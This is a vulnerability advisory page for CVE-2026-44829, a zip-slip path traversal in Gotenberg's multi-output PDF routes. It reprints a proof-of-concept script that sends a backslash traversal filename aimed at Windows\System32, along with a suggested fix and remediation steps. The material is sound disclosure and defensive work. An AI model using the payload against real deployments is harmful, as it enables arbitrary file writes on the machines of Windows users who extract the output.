Skip to main content

Gotenberg CVE-2026-44829

HIGH
Path Traversal (CWE-22)
2026-05-29 https://github.com/gotenberg/gotenberg GHSA-hwc4-gmrw-5222
8.8
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.8 HIGH
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
High
Availability
Low

Lifecycle Timeline

3
Source Code Evidence Fetched
May 29, 2026 - 17:20 vuln.today
Analysis Generated
May 29, 2026 - 17:20 vuln.today
CVE Published
May 29, 2026 - 16:38 nvd
HIGH 8.8

DescriptionGitHub Advisory

Summary

filepath.Base on the Linux container does not strip backslashes (\), because \ is only a path separator on Windows. A multipart filename like ..\..\..\..\Windows\System32\evil.pdf survives Gotenberg's input sanitisation and lands verbatim as the zip entry name when a multi-output route returns its result as a zip (e.g. /forms/pdfengines/split). Windows zip extractors interpret \ as a path separator and write the file outside the extraction directory.

Details

pkg/modules/api/context.go:434, 472:

go
filename := norm.NFC.String(filepath.Base(fh.Filename))

On Linux, filepath.Base("..\\..\\..\\..\\Windows\\System32\\evil.pdf") returns the same string verbatim - there are no / separators to find. The original filename then flows to ctx.diskToOriginal (pkg/modules/api/context.go:459, 393) and through pkg/modules/pdfengines/routes.go:287-322 (SplitPdfStub), which builds:

go
originalNameNoExt := strings.TrimSuffix(originalName, filepath.Ext(originalName))
newOriginal      := fmt.Sprintf("%s_%d.pdf", originalNameNoExt, i)
ctx.RegisterDiskPath(newPath, newOriginal)

Finally pkg/modules/api/context.go:617-642 constructs the zip via archives.FilesFromDisk + archives.Zip{}.Archive. mholt/archives@v0.1.5/archives.go:155-184 (nameOnDiskToNameInArchive) returns path.Join(rootInArchive, "") - the map value verbatim.

Suggested fix

diff
- filename := norm.NFC.String(filepath.Base(fh.Filename))
+ filename := sanitizeFilename(fh.Filename)
+
+ func sanitizeFilename(name string) string {
+     if i := strings.LastIndexAny(name, "/\\"); i >= 0 {
+         name = name[i+1:]
+     }
+     name = norm.NFC.String(name)
+     // Optional belt-and-braces:
+     name = strings.ReplaceAll(name, "..", "_")
+     name = strings.Map(func(r rune) rune {
+         if r < 0x20 || r == 0x7f { return -1 }
+         return r
+     }, name)
+     return name
+ }

The same sanitiser closes Advisory 8.

PoC

Prerequisite: pip install requests. curl -F filename= mangles backslashes on some shells, so we use Python's requests to deliver the malicious filename byte-perfect.

bash
mkdir -p /tmp/gotenberg-poc && cd /tmp/gotenberg-poc

docker rm -f gotenberg-audit 2>/dev/null
docker run -d --rm --name gotenberg-audit -p 3000:3000 gotenberg/gotenberg:8.32.0
i=0; until [ "$(curl -s -o /dev/null -w '%{http_code}' http://localhost:3000/health)" = "200" ] || [ $i -ge 30 ]; do i=$((i+1)); sleep 2; done
# Stub PDF.
printf '%%PDF-1.4\n1 0 obj<</Type/Catalog/Pages 2 0 R>>endobj\n2 0 obj<</Type/Pages/Kids[3 0 R]/Count 1>>endobj\n3 0 obj<</Type/Page/Parent 2 0 R/MediaBox[0 0 612 792]>>endobj\nxref\n0 4\n0000000000 65535 f\n0000000010 00000 n\n0000000053 00000 n\n0000000100 00000 n\ntrailer<</Size 4/Root 1 0 R>>\nstartxref\n158\n%%%%EOF\n' > stub.pdf
# Step 1: produce a 2-page PDF so /split returns multiple entries.
curl -s -o two.pdf -X POST http://localhost:3000/forms/pdfengines/merge \
    -F 'files=@stub.pdf;filename=a.pdf' \
    -F 'files=@stub.pdf;filename=b.pdf'
# Step 2: split, declaring the multipart filename as a Windows path-traversal payload.
python3 - <<'PY'
import requests, zipfile, binascii
fname = '..\\..\\..\\..\\Windows\\System32\\evil.pdf'
files = {'files': (fname, open('two.pdf', 'rb'), 'application/pdf')}
data  = {'splitMode': 'intervals', 'splitSpan': '1'}
r = requests.post('http://localhost:3000/forms/pdfengines/split', files=files, data=data)
print(f'HTTP={r.status_code}  ctype={r.headers.get("content-type")}  bytes={len(r.content)}')
open('split.zip', 'wb').write(r.content)

z = zipfile.ZipFile('split.zip')
print('--- zip entries (orig_filename) ---')
for info in z.infolist():
    print(f'   {info.orig_filename!r}')
# Show raw central-directory bytes to prove backslashes are on the wire:
data = open('split.zip', 'rb').read()
idx = data.find(b'PK\x01\x02')
print('--- raw central-dir hex around filename ---')
print(f'   {binascii.hexlify(data[idx:idx+80]).decode()}')
PY

docker stop gotenberg-audit

Observed output:

HTTP=200  ctype=application/zip  bytes=24750
--- zip entries (orig_filename) ---
   '..\\..\\..\\..\\Windows\\System32\\evil_0.pdf'
   '..\\..\\..\\..\\Windows\\System32\\evil_1.pdf'
--- raw central-dir hex around filename ---
   504b010214031400080800009a7da25c61b6fc178e2f00008e2f0000270009000000000000000000a481000000002e2e5c2e2e5c2e2e5c2e2e5c57696e646f77735c53797374656d33325c6576696c5f

The trailing hex 2e2e5c 2e2e5c 2e2e5c 2e2e5c 57696e646f7773 5c 53797374656d3332 5c 6576696c5f decodes to ..\..\..\..\Windows\System32\evil_. (Python's ZipFile.namelist() would normally hide this by displaying /, but info.orig_filename returns the literal backslash form.)

To see the Windows-side traversal effect on a Windows host, run:

powershell
Expand-Archive -Path .\split.zip -DestinationPath .\out -Force
Get-ChildItem .\out -Recurse
# → out\Windows\System32\evil_0.pdf
# → out\Windows\System32\evil_1.pdf

PowerShell collapses the .. parents but creates the Windows\System32\ subdirectory tree. 7-Zip and WinRAR with default settings honor the .. parents and traverse out of the extraction directory entirely.

Impact

  • Arbitrary file write on a Windows-side consumer that extracts the returned zip (Windows Explorer, 7-Zip, WinRAR, .NET ZipFile.ExtractToDirectory).
  • Reachable via every multi-output Gotenberg route - /forms/pdfengines/split, /forms/pdfengines/flatten//encrypt//embed//watermark//stamp//rotate (when called with multiple input PDFs), /forms/libreoffice/convert with multiple inputs, /forms/pdfengines/convert.
  • Also reachable via downloadFrom upstream Content-Disposition: filename="..\\..\\evil.exe" - the filename flows through the same ctx.diskToOriginal map at pkg/modules/api/context.go:354, 393.

AnalysisAI

Zip slip path traversal in Gotenberg through version 8.32.0 allows remote unauthenticated attackers to plant files outside the extraction directory on Windows hosts that unzip multi-output API responses. Because Gotenberg runs on Linux containers, its filepath.Base sanitisation never strips Windows-style backslashes from uploaded multipart filenames, so a crafted name like '..\..\..\Windows\System32\evil.pdf' is preserved verbatim as a zip entry name and honoured by Windows extractors (7-Zip, WinRAR, .NET ZipFile, Explorer). A working publicly available exploit code exists in the GHSA advisory; the issue is not present in CISA KEV and no EPSS score was provided.

Technical ContextAI

Gotenberg is a Go-based HTTP service (github.com/gotenberg/gotenberg/v8, pkg:go) that wraps Chromium, LibreOffice and PDF engines to convert documents. The root cause is a classic CWE-22 path traversal arising from a host/target OS mismatch: in pkg/modules/api/context.go (lines 434 and 472) the handler calls filepath.Base(fh.Filename), but Go's filepath package on Linux only treats '/' as a separator, leaving backslash sequences untouched. The unsanitised name flows through ctx.diskToOriginal and SplitPdfStub into the mholt/archives v0.1.5 library, whose nameOnDiskToNameInArchive writes the supplied map value verbatim into the zip central directory. The same diskToOriginal map is also reachable through the downloadFrom Content-Disposition filename parameter, broadening the input surface beyond direct multipart uploads.

RemediationAI

Vendor-released patch: upgrade to Gotenberg v8.33.0 or later, whose release notes (https://github.com/gotenberg/gotenberg/releases/tag/v8.33.0) explicitly add stripping of both forward-slash and backslash path separators from caller-supplied Gotenberg-Output-Filename headers and multipart filename fields. If immediate upgrade is not possible, sanitise filenames at an upstream proxy by rejecting or rewriting any multipart filename or Content-Disposition parameter containing '\' or '..' before the request reaches Gotenberg (this may break legitimate Windows clients that submit native paths). As an additional defensive layer, change downstream consumers to extract Gotenberg zip output with tooling that normalises backslashes and rejects '..' segments - for example, validate each zip entry name with a path-canonicalisation step in the consuming pipeline - rather than feeding the archive straight into 7-Zip/WinRAR/ZipFile.ExtractToDirectory; the trade-off is added latency and code in every consumer. Disabling the multi-output routes (/forms/pdfengines/split and similar) and the downloadFrom feature eliminates exposure but removes core product functionality.

More in Docker

View all
CVE-2024-55964 CRITICAL POC
9.8 Mar 26

An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl

CVE-2019-5736 HIGH POC
8.6 Feb 11

runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac

CVE-2023-32077 HIGH POC
7.5 Aug 24

Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2023-5815 HIGH POC
8.1 Nov 22

The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post

CVE-2014-9357 CRITICAL
10.0 Dec 16

Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build

CVE-2026-34156 CRITICAL POC
9.9 Mar 30

Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l

CVE-2019-15752 HIGH POC
7.8 Aug 28

Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c

CVE-2025-34221 CRITICAL POC
10.0 Sep 29

Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2

CVE-2024-23054 CRITICAL POC
9.8 Feb 05

An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du

CVE-2025-23211 CRITICAL POC
9.9 Jan 28

Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve

CVE-2026-46339 CRITICAL POC
10.0 May 19

Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at

Share

CVE-2026-44829 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy